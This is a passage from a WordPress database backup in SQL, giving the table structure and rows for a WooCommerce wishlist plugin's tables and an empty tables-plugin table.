INSERT INTO `wp_yith_wcwl` VALUES (28, 1149, 1, 191, 33, '2016-11-24 12:16:12'); 
INSERT INTO `wp_yith_wcwl` VALUES (29, 1263, 1, 1, 1, '2016-12-14 17:37:39'); 
INSERT INTO `wp_yith_wcwl` VALUES (30, 347, 1, 2, 2, '2016-12-28 20:10:53'); 
INSERT INTO `wp_yith_wcwl` VALUES (32, 1152, 1, 357, 47, '2017-01-18 17:26:18'); 
INSERT INTO `wp_yith_wcwl` VALUES (33, 977, 1, 366, 48, '2017-01-20 00:02:15'); 
INSERT INTO `wp_yith_wcwl` VALUES (34, 1338, 1, 372, 49, '2017-01-20 21:57:00'); 
INSERT INTO `wp_yith_wcwl` VALUES (35, 623, 1, 372, 49, '2017-01-20 21:57:00'); 
INSERT INTO `wp_yith_wcwl` VALUES (36, 1690, 1, 418, 53, '2017-02-02 18:20:24'); 
INSERT INTO `wp_yith_wcwl` VALUES (37, 441, 1, 1, 1, '2017-02-07 20:33:49');
#
# End of data contents of table `wp_yith_wcwl`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_yith_wcwl_lists`


#
# Delete any existing table `wp_yith_wcwl_lists`
#

DROP TABLE IF EXISTS `wp_yith_wcwl_lists`;


#
# Table structure of table `wp_yith_wcwl_lists`
#

CREATE TABLE `wp_yith_wcwl_lists` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL,
  `wishlist_slug` varchar(200) NOT NULL,
  `wishlist_name` text,
  `wishlist_token` varchar(64) NOT NULL,
  `wishlist_privacy` tinyint(1) NOT NULL DEFAULT '0',
  `is_default` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  UNIQUE KEY `wishlist_token` (`wishlist_token`),
  KEY `wishlist_slug` (`wishlist_slug`)
) ENGINE=InnoDB AUTO_INCREMENT=57 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_yith_wcwl_lists`
#
 
INSERT INTO `wp_yith_wcwl_lists` VALUES (1, 1, '', '', 'JQL3TAETH9BB', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (2, 2, '', '', '1Z9HT4V9QJBC', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (3, 6, '', '', '5JHC8N5T84O5', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (4, 16, '', '', 'GP945E8WCJDQ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (5, 19, '', '', 'T0LW8Q3YJDE6', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (6, 26, '', '', 'YKDXYGFT1GO6', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (7, 33, '', '', 'YCR08YJ79Z4W', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (8, 59, '', '', 'WGRICVFS9CFI', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (9, 79, '', '', 'IUAOK0UR83Q7', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (10, 80, '', '', 'K2P71IWE470I', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (11, 83, '', '', 'SVCAV0LCBWM7', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (12, 95, '', '', '3POYX6NG0HPB', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (13, 98, '', '', '7RBUXERDCP2C', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (14, 100, '', '', 'SQR4X9MYFL52', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (15, 102, '', '', '0A65BN3QRRXJ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (16, 106, '', '', 'Z8EOPPSPFNEX', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (17, 117, '', '', '5UYREG270L98', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (18, 116, '', '', 'HP372HLT4I61', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (19, 118, '', '', 'VI76EL9ZW7SW', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (20, 123, '', '', 'P16ELNJZVIFQ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (21, 125, '', '', 'PPX1U90EIOWN', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (22, 128, '', '', '5FVLCUYSNVBB', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (23, 134, '', '', 'T1O7C5ZA1BPC', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (24, 136, '', '', 'K0UYKD1XYWBE', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (25, 141, '', '', 'VSFAHMVZZDX5', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (26, 145, '', '', 'TOX5L74MRMTQ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (27, 153, '', '', '8CY0IH4US8E9', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (28, 163, '', '', 'L32D3JF6P27P', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (29, 167, '', '', 'LK19CB819H28', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (30, 170, '', '', 'S25NSEOXVLUC', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (31, 181, '', '', 'KIVJDMONRLTO', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (32, 185, '', '', 'SE9D5IHT4PPS', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (33, 191, '', '', 'C5Z7NZA0FM5T', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (34, 192, '', '', '85EXWBUPBUDO', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (35, 218, '', '', 'NLAD2WE70W3Q', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (36, 224, '', '', '2R2HAAPPPTJ8', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (37, 234, '', '', '2SZANPMLZMIN', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (38, 240, '', '', 'UGGOZO6LT9FY', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (39, 243, '', '', 'KPZG51OWOBB4', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (40, 242, '', '', '9CQ9YI8RDCZJ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (41, 256, '', '', '7RBTHKRGAI96', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (42, 264, '', '', 'L3K1PI1TDE4I', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (43, 275, '', '', 'TS03KRAVKYCY', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (44, 278, '', '', '3HHWK62WY4VJ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (45, 289, '', '', 'XZ9ODCMFNM46', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (46, 340, '', '', 'Y1K9JEO8539X', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (47, 357, '', '', '4YWNBPDC6MNJ', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (48, 366, '', '', 'WIL97E85I8B4', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (49, 372, '', '', 'OYT3PESJPUXM', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (50, 392, '', '', 'YL0CCLG47II7', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (51, 412, '', '', 'COGG910TUTAB', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (52, 416, '', '', 'C18LU35CZA9Y', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (53, 418, '', '', '5QJ0N0VE8KA9', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (54, 425, '', '', 'IBZHFGES3ZVD', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (55, 426, '', '', '11084ITKKVMO', 0, 1); 
INSERT INTO `wp_yith_wcwl_lists` VALUES (56, 430, '', '', 'AN5E3XY7NEH3', 0, 1);
#
# End of data contents of table `wp_yith_wcwl_lists`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wpsm_tables`


#
# Delete any existing table `wpsm_tables`
#

DROP TABLE IF EXISTS `wpsm_tables`;


#
# Table structure of table `wpsm_tables`
#

CREATE TABLE `wpsm_tables` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `name` tinytext NOT NULL,
  `rows` mediumint(9) NOT NULL,
  `cols` mediumint(9) NOT NULL,
  `subs` tinytext NOT NULL,
  `color` tinytext NOT NULL,
  `responsive` tinyint(1) NOT NULL DEFAULT '0',
  `tvalues` longtext NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 ;

#
# Data contents of table `wpsm_tables`
#

#
# End of data contents of table `wpsm_tables`
# --------------------------------------------------------

